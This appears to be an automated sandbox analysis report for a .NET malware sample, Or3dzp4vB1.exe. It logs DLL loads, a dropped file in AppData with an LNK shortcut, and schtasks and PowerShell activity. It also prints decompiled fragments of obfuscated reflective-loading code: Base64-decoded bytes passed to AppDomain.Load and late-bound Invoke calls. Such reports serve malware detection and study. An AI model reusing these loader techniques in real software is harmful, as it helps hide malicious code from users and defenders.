Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: cryptbase.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: wldp.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: twinui.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: dwmapi.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: pdh.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: actxprxy.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: propsys.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: profapi.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.ui.appdefaults.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.ui.immersive.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: uiautomationcore.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: dui70.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: duser.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: dwrite.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: uianimation.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: d3d11.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: dxcore.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: dcomp.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: oleacc.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: edputil.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.ui.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: windowmanagementapi.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: inputhost.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: windowscodecs.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: thumbcache.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: sxs.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: directmanipulation.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: wldp.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: twinui.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: dwmapi.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: pdh.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: actxprxy.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: propsys.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: profapi.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.ui.appdefaults.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.ui.immersive.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: uiautomationcore.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: dui70.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: duser.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: dwrite.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: uianimation.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: d3d11.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: dxcore.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: dcomp.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: oleacc.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: edputil.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.ui.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: windowmanagementapi.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: inputhost.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: windowscodecs.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: thumbcache.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: sxs.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: directmanipulation.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\0720XW Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32 Jump to behavior
Source: 0720XW.lnk.0.dr LNK file: ..\..\..\..\..\0720XW
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Or3dzp4vB1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Or3dzp4vB1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

barindex
Source: Or3dzp4vB1.exe, wgogUBpxJ288HdJhyjxTGDCvz8.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{fKaGa2Ywr5w3PQGiDmBI7REAS2.OfmMe96PKz6fBbr5ERVLa0ECNU,fKaGa2Ywr5w3PQGiDmBI7REAS2.Qd9IkzXLcYSpeUDcLiJ0k6jSSB,fKaGa2Ywr5w3PQGiDmBI7REAS2.gCWEUye2elEc21qKVKv6jS5nVe,fKaGa2Ywr5w3PQGiDmBI7REAS2._756niOLr7HAcJ3K5pTXXhRxOqW,v1WK3HQ1SJk.r7uo75hMYra()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Or3dzp4vB1.exe, wgogUBpxJ288HdJhyjxTGDCvz8.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{U7UF6FVShoQaqZCocZieCFKMOI[2],v1WK3HQ1SJk.yK06dlAZ5bW(Convert.FromBase64String(U7UF6FVShoQaqZCocZieCFKMOI[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Or3dzp4vB1.exe, wgogUBpxJ288HdJhyjxTGDCvz8.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { U7UF6FVShoQaqZCocZieCFKMOI[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0720XW.0.dr, wgogUBpxJ288HdJhyjxTGDCvz8.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{fKaGa2Ywr5w3PQGiDmBI7REAS2.OfmMe96PKz6fBbr5ERVLa0ECNU,fKaGa2Ywr5w3PQGiDmBI7REAS2.Qd9IkzXLcYSpeUDcLiJ0k6jSSB,fKaGa2Ywr5w3PQGiDmBI7REAS2.gCWEUye2elEc21qKVKv6jS5nVe,fKaGa2Ywr5w3PQGiDmBI7REAS2._756niOLr7HAcJ3K5pTXXhRxOqW,v1WK3HQ1SJk.r7uo75hMYra()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0720XW.0.dr, wgogUBpxJ288HdJhyjxTGDCvz8.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{U7UF6FVShoQaqZCocZieCFKMOI[2],v1WK3HQ1SJk.yK06dlAZ5bW(Convert.FromBase64String(U7UF6FVShoQaqZCocZieCFKMOI[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0720XW.0.dr, wgogUBpxJ288HdJhyjxTGDCvz8.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { U7UF6FVShoQaqZCocZieCFKMOI[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: Or3dzp4vB1.exe, wgogUBpxJ288HdJhyjxTGDCvz8.cs .Net Code: qWy2E8XSCtTc1JKzdFAQi6Nl7V System.AppDomain.Load(byte[])
Source: Or3dzp4vB1.exe, wgogUBpxJ288HdJhyjxTGDCvz8.cs .Net Code: Oy8bNhw1cIkEGBeYrosDf1RWwU System.AppDomain.Load(byte[])
Source: Or3dzp4vB1.exe, wgogUBpxJ288HdJhyjxTGDCvz8.cs .Net Code: Oy8bNhw1cIkEGBeYrosDf1RWwU
Source: 0720XW.0.dr, wgogUBpxJ288HdJhyjxTGDCvz8.cs .Net Code: qWy2E8XSCtTc1JKzdFAQi6Nl7V System.AppDomain.Load(byte[])
Source: 0720XW.0.dr, wgogUBpxJ288HdJhyjxTGDCvz8.cs .Net Code: Oy8bNhw1cIkEGBeYrosDf1RWwU System.AppDomain.Load(byte[])
Source: 0720XW.0.dr, wgogUBpxJ288HdJhyjxTGDCvz8.cs .Net Code: Oy8bNhw1cIkEGBeYrosDf1RWwU
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFAACB8D2A5 pushad ; iretd 2_2_00007FFAACB8D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFAACCA0942 push E95AABD0h; ret 2_2_00007FFAACCA09C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFAACD72316 push 8B485F95h; iretd 2_2_00007FFAACD7231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFAACBCD2A5 pushad ; iretd 11_2_00007FFAACBCD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFAACDB2316 push 8B485F91h; iretd 11_2_00007FFAACDB231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFAACB8D2A5 pushad ; iretd 15_2_00007FFAACB8D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFAACD72316 push 8B485F95h; iretd 15_2_00007FFAACD7231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAACB8D2A5 pushad ; iretd 17_2_00007FFAACB8D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAACD72316 push 8B485F95h; iretd 17_2_00007FFAACD7231B
Source: Or3dzp4vB1.exe, XKCxMrKYDPJ.cs High entropy of concatenated method names: '_4Wq7wUQrvV4', 'TM7eQerxMxo', '_1X26WUw8S0i', 'GEG8iUfaIYEAmNmcUZ5mi', 'AAoBITHtn57KIPVUxyoYS', 'fI4K21gzErYdhSpsSnPHe', 'VpBs7zSudJO6TvgyN6bHK', 'fY6SKyua5jJFnRecDAS7U', 'XhtoqOaFZKVZdXGd2ZMwn', 'MfplRFiWoOVKnpyJLzTv4'
Source: Or3dzp4vB1.exe, aMBq7AoUdbi.cs High entropy of concatenated method names: 'YjnS6rgTn5x', 'tXs77Ner9js', 'afRdwGzyVtG', 'Uz6F61eWSVB', 'xaoaudGCeemLeY5INfFjHRcyeoA3N2rFlwWgNqSfkBBEjBIgv5bUXQonUEouU26kcS9xl6lYBqmfUe', 'hMf7Uh1WpmIzgRRR6AtkFuYUuMKLqLXmLge9nZNyCksbm98oH9ISMj1CKMFzgGbQbioYRrvTy5oiJO', 'Jy53AGECYypLOGJv4jX6LOLs49Kgn7nwGpF2Hr8QI1iuLFl8g6jFTOHalqjmcInXsB80W4uugiMOZw', '_6fODW7JyfZDcfXDQa5BMZscIkmm3yyxxWGj71CpLW2lAXmVcnh9gQwq0Ghhhne9OE8DFGyxZ3sLQh1', 'vqpy57XNyMUFktz2MCm1sN8VQSc09ehxBs9PjDj2KQFfZubbQyjSX1aOctj5nHjKAgKkdkEKO660j8', 'Nx8FtENUC0LP2Su2r4RgaAyyy1Ri25T9kXJOtHRfJVN6oeUyxP2k1BTGsLZWVtMswHLsQuEYKYysmj'
Source: Or3dzp4vB1.exe, 7JiCBK2jKP4.cs High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'xmZjWrOtWOK', 'kGNUZ8BBRvLJxTgP39vKiskhNilLWlzFFV4cDaOVlMdzEjLSj1xRtPFQoXsp3UjU1GSW5DafaBf6mruLXWitJs2NqcaFC', 'PyRIWUeldzjtRMcB7Iundx5NRU84BxtpoWgOIbCcPiZqcY4rMKOXfb3jA7Oo3gy4yMlJ5yY7lWhIl3aRHSYedrLYUAKiC', 'S66p4NaO1QiZREbhbnfsfwsKXhVNoqEzwyP5kdZsqzKMoIRSBTf0dQd1WulIm4WVQPc28JjIJ0VDne', 'W62WXt6V3pXbZ3SXuvZbDmpNSjj6t9qUMKPpJSwJpodYrhi048NObyjA4zRrsCqUt7wof6GkVrPg9M'
Source: Or3dzp4vB1.exe, wgogUBpxJ288HdJhyjxTGDCvz8.cs High entropy of concatenated method names: 'jVmkKMdstbzzSNoABl88HocT0p', 'qWy2E8XSCtTc1JKzdFAQi6Nl7V', 'u5YAXQo9PWkuFnzINaPfvD0aOu', 'MKqGNgN5zCpQvxCK8Et9gDk0jk', 'ihGf0hY79InhFh2aZYe5mgEgKl', 'DMusHCDdVmslT8N7yMm2gh6NQa', 'Q9MaVd5JdBQ3g1VLeR2Df2M0bc', 'DsOdJwb5RCMHFeGR6tQigW9B22', 'epN8Kkwbqy86fRKkDW7HhuLJXU', 'aMcwASUT5JHnrsz1gpYdM4FAFB'
Source: Or3dzp4vB1.exe, DjfjT5OwA7O.cs High entropy of concatenated method names: 'rtkvH2LWxcF', 'GGZXgumyHH1', 'wtr4eJLwvNOcYeDOrUvzWjEm8ZNDoDUtfbwhy0XoYkboZzNc5PHopos74lEmNrc7QTdKuE1UAbVjp9', 'ZUILCFq1x0ixLMS0fNXQezD6EWJpT1W4T0LekNvRCbxINjreWnyBE0wefIlyNWGVGLjgyijq6tTaYP', 'uqWNCQ5vYZkoUA39WX5FyIKBCCdKdfEbc1nRtIhfcwOo8ofLU17IAa5uoBDjPcc9UTaGKj2RC5VFtt', 'lJ3sVZrjNS2CrE5FP4Iq2dgzeQNZaPpifwryCO5gEoV6ysU8YptPaR5CRoXFf30KzU2W6jsYIo8zlg'
Source: Or3dzp4vB1.exe, UVh6gYqDsRseIc6LISxgabwfDL.cs High entropy of concatenated method names: 'DSCAbwMnxRr7s0CyzNRcAC7vVx', 'rHTu5xsEbhlnGxYGRDSEneJExz', 'jMlIBniz0G0KBYkxzwjDyjCp4a', 'iAV2B28o53XoR0fcSOnb6zZSvJ', 'oT9BRwtAwJ3PXU0msFPNwe5Sxl', 'kKtvD7IccIJRnBTz5bW8k1TZMI', 'tm0PFEVMWu8s50OXfwIOkl9DR3', 'xe2Bvj4V4xB', 'OxNJzl1jVor', 'wNuTMZjjDyX'
Source: Or3dzp4vB1.exe, v1WK3HQ1SJk.cs High entropy of concatenated method names: 'YlmC3pb68NB', 'buL8kR0oIiB', 'x1xfZCV3rwQ', 'whb3Qh9SjIG', 'SAZnAqHpmwQ', 'ekkMuNK2jcz', 'ZSNDpc7VeAu', 'DmXrmqJaYdc', 'qkGejArAPUg', 'dk1qwuWDkc0'
Source: Or3dzp4vB1.exe, 2PiJ0XhLI0Qp8KhHBi10nRhXgt.cs High entropy of concatenated method names: '_1IbDOXDulvGK89BzdxkPXa2b0Z', 'VyUpp9scFeA', 'kHkif2Mmrxy', 'DcdysQvsw9u', 'RgVqbUuRszX', 'r5XztVKM2ed', 'tEfshgdcdk3', 'hBxFFg2eETE', 'iVUy0gaRpYh', 'ATwj6CdWP5c'
Source: Or3dzp4vB1.exe, jGEa6BYs0PLz0bPSuuML3cXJ6C.cs High entropy of concatenated method names: 'MSA8IbsX3mwvSFphnHRsQVgEgY', 'CpUujZSdP2JvfAZKAufC2Zqcp1zi7hYKChPMyLHwk8YReX87YEmkcRiohgABDDoiNKE1m5bpKVSY', 'mqDkrHTPT1hbkm7Z8dcRpqDFC8BYP87YyvRWjl2LlnzpoFr32TTxyveUtk1MzL2SFmLJbl2zEdBe', 'H841selCro0xvgoYufMdmXBw5RvzW3PzCLK8hEPMEAA3MJFZ8fNQmCy7dr0MVOJ6a8ID4j9hd31H', 'FXvaLdv3oSxguFTmFIZ4NghnwsST1w92btk6L4hrR5BtpkDyyG0Od5rERwFbI5nVz2x7O21AMrKe'
Source: Or3dzp4vB1.exe, 6tNVwwp2mfC.cs High entropy of concatenated method names: 'vM6XSdz8mMu', 'mttYXo6jbFUJPCV3yvi5TS8tXWag4jzmkSn5tfvGEUjLj2KEfw6KZlGuTNAnb51sJADcbAW6FgTBmW', 'WoQQkJeVqYg5HVtavuA7NHaxDsykT9EbRBwSxHscKc58JFXEkEonZtPS1m3Nq7tirj4wYloRY505bw', 'i4ER7tGwmD7eFKamNt9schZEf2fOLJQFxIliGZoMBl0hafrHJrm7KpNZNLzFZT4CpjDaH90rdCylVX', '_8RvOPLbVCCBRGuLKoi2rHzJ5mYLtZB3P2ahq7moSlbLGDDPF2aaIrWoO6wsWAkdHvooNwc1NBEniNi'
Source: Or3dzp4vB1.exe, G4bL9AcMy6N.cs High entropy of concatenated method names: 'RegexResult', 'WndProc', 'WSNdFLy8Hc7sJaqGIGfzBTJDBppT9CvgmiSEssA8y3BGqHQWhfK7GPzenh0CBXcGgmTqbNblwB3djL', 'X5oed2KF6qlXYfbjpF1JL7cVTqU0XRnHkcXXd0cKGXJUdHkGLZGbaek7GXJMfOvCBLp2wGrs2ICbK3'
Source: Or3dzp4vB1.exe, T8OeMrVcLjImLRIolSzxRmx4be.cs High entropy of concatenated method names: 'ykZWS7LvuIYNONbiVEsNDfx2ry', 'bfmqyChL0E0rDbp7Z846RlVLrR', '_8YERJqyml6SCjt9B4dJ77CwH7S', 'R3V6Omm38oSRQxtqYOy5LDxrc7ZhAQ7hToOUW7zZpWRwdZUaAbGLSK9kumDjNggYsa0UyFIlTz9U', 'UkelaLSCF7wYsHif0kvqIBlCUOIA9npm8B0QpgEG0YIRLGNCDj5ZO8eLmtgxi12kFEMDTKuaLpPu', 'gfUdpKZ4gHwp2qWCcsJNYfvTo0f9stxLDFdxOeHW4v16biAiWSNcm1xgMzjspYEObdluPrgA6DYX', '_4KOrpYbZEFqVSRQKxTQCZ3CdTbiwkNBCp9QP1XNaWKFCHf6MGiWlxEHPhfpaPYTYYF0exx92F2sv', '_4ByAM2p7sPUvpjYXfPaY5CofhI3rwS4CtkkcFNe4dfXHUkqQHSjGoAF6rWf0gnKvddnVJDlkKOm6', 'kkSh58Hm9xu0g8COzdRu2tCxy2AUbV2gUVnYtaVozJsddia8UxVDN07zVlDWLOSQlvl1gv16oBuZ', 'OtxiTMEdP1SYC6JFCaeeqzC1iYgsbfPyZynuPKU7CUTpZPpZ0Cnlh9VFGcYnzM4M5Lx15NOq9GDv'
